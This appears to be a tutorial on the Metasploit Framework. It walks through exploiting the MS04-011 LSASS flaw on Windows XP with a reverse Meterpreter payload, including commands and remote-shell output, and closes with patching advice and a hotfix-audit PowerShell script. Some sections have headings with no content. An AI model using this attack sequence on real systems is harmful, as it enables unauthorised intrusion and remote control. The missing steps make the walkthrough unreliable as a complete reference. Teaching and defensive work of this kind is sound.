METASPLOIT
1. Introducing Metasploit
The Metasploit Framework is an environment used to test, attack, and exploit vulnerabilities in services. Metasploit is built in object-oriented Perl, with components written in C, assembler, and Python. Metasploit runs on most operating systems: Linux, Windows, and MacOS. You can download the program at metasploit.com.
From version 2.2 onwards, Metasploit can update itself automatically using the msfupdate.bat script in the installation directory.
2. Components of Metasploit
Metasploit supports multiple interfaces with users:
Environment:
You can save the environment you have configured with the save command. That environment is stored in /.msf/config and is loaded again the next time the user interface is started.
Options that are shared between exploit modules, such as LPORT, LHOST, and PAYLOAD, should be defined in the global environment.
For example:
msf> setg LPORT 80
msf> setg LHOST 172.16.8.2
3. How to use the Metasploit framework
3.1. Select module exploit:
Select the vulnerable program or service that Metasploit supports exploiting.
You should regularly check for new service vulnerabilities on metasploit.com or update via the msfupdate.bat script.
3.2. Configure the selected exploit module:
Some modules also have advanced options, which you can view by typing the show advanced command.
3.3. Confirm the configuration options:
3.4. Select target:
Select the operating system of the target you want to exploit.
For example:
msf> use windows_ssl_pct
show targets
Exploit will list the targets such as: winxp, winxp SP1, win2000, win2000 SP1
3.5. Select payload:
Payload is the code that will run on the remote computer system.
3.6. Execute exploit:
4. Introduce the payload meterpreter
Meterpreter, short for Meta-Interpreter, is an advanced payload included in the Metasploit framework. Its purpose is to provide scripts for exploiting and attacking remote computers. Developers write it in the form of shared object (DLL) files. Meterpreter and its extension components are loaded in memory and never written to disk, so detection by antivirus software can be avoided.
Meterpreter provides scripts so we can work on the remote computer:
Use the command:
Using the Fs module: allows uploading files to and downloading files from the remote machine.
Using the Net module:
Using the Process module:
Using the Sys module:
5. For example
The local host with address 192.168.1.1 will attack the remote machine with address 192.168.1.2 through the Lsass_ms04_011 exploit. This is a stack overflow in the LSA (Local Security Authority) service. Lsass.exe is a Microsoft Windows system process responsible for local security authentication, Active Directory management, and login policies. Lsass controls both client and server authentication.
Msf> use Lsass_ms04_011
Msf> set PAYLOAD win32_reverse_meterpreter
Msf> set RHOST 192.168.1.2
Msf> set LHOST 192.168.1.1
Msf> exploit
Meterpreter> help
Meterpreter> use -m P // load the Process module
Meterpreter> help
Meterpreter> ps // list the processes running on the remote machine
Meterpreter> kill // terminate a process running on the remote machine
Meterpreter> // run the remote machine's command line (cmd)
execute: success, process id is 3516.
execute: allocated channel 1 for new process.
meterpreter> interact 1
interact: Switching to interactive console on 1 .
interact: Started interactive channel 1.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS> echo Meterpreter interactive channel in action
echo Meterpreter interactive channel in action
Meterpreter interactive channel in action
C:\WINDOWS> ipconfig
Caught Ctrl-C, close interactive session? [y / N] y
meterpreter>
6. How to prevent
Regularly apply Microsoft patches. For example, to stop Metasploit from exploiting the Lsass_ms04_011 vulnerability, you must install the Microsoft patch. According to Microsoft, this is a serious vulnerability present in almost all Windows operating systems. You should install hotfix number 835732 to patch it.
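An added example (not from the original article) of checking that fix from the administrator's side: it queries each host for the KB835732 hotfix and reports the ones still missing it. It assumes the account running it has remote WMI rights on each host; the host names are placeholders.

```powershell
# Added example, not part of the original article: audit Windows hosts for the
# MS04-011 hotfix (KB835732) that closes the LSASS flaw used by Lsass_ms04_011.
# Assumptions: remote WMI access to each host; host names below are placeholders.
$hostsToCheck = @('WORKSTATION-A', 'SERVER-B')   # placeholder host names
$requiredKb   = 'KB835732'                        # hotfix number named in the article

function Test-Ms04011Patch {
    param([string]$ComputerName)
    try {
        # OS caption and version identify the build (Windows 2000 is 5.0, XP is 5.1)
        $os = Get-WmiObject -Class Win32_OperatingSystem -ComputerName $ComputerName -ErrorAction Stop
        # Get-HotFix writes a non-terminating error when the KB is absent; silence it
        $fix = Get-HotFix -Id $requiredKb -ComputerName $ComputerName -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Computer  = $ComputerName
            OS        = $os.Caption
            Version   = $os.Version
            Patched   = [bool]$fix
            Installed = if ($fix) { $fix.InstalledOn } else { $null }
        }
    } catch {
        # Unreachable hosts are reported as unpatched so they are not silently skipped
        [pscustomobject]@{ Computer = $ComputerName; OS = 'unreachable'; Version = $null; Patched = $false; Installed = $null }
    }
}

$results = $hostsToCheck | ForEach-Object { Test-Ms04011Patch -ComputerName $_ }
$results | Format-Table -AutoSize

# Hosts still exposed to the exploit walked through in section 5
$results | Where-Object { -not $_.Patched } | ForEach-Object {
    Write-Warning "$($_.Computer) ($($_.OS)) is missing $requiredKb"
}
```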
TipsMake.com and readers thank you:
Viking - (ENS Group) - Adminvietnam (vuevietnam.com/forum) has cooperated to submit this article.
E mail: thanhtung22@gmail.com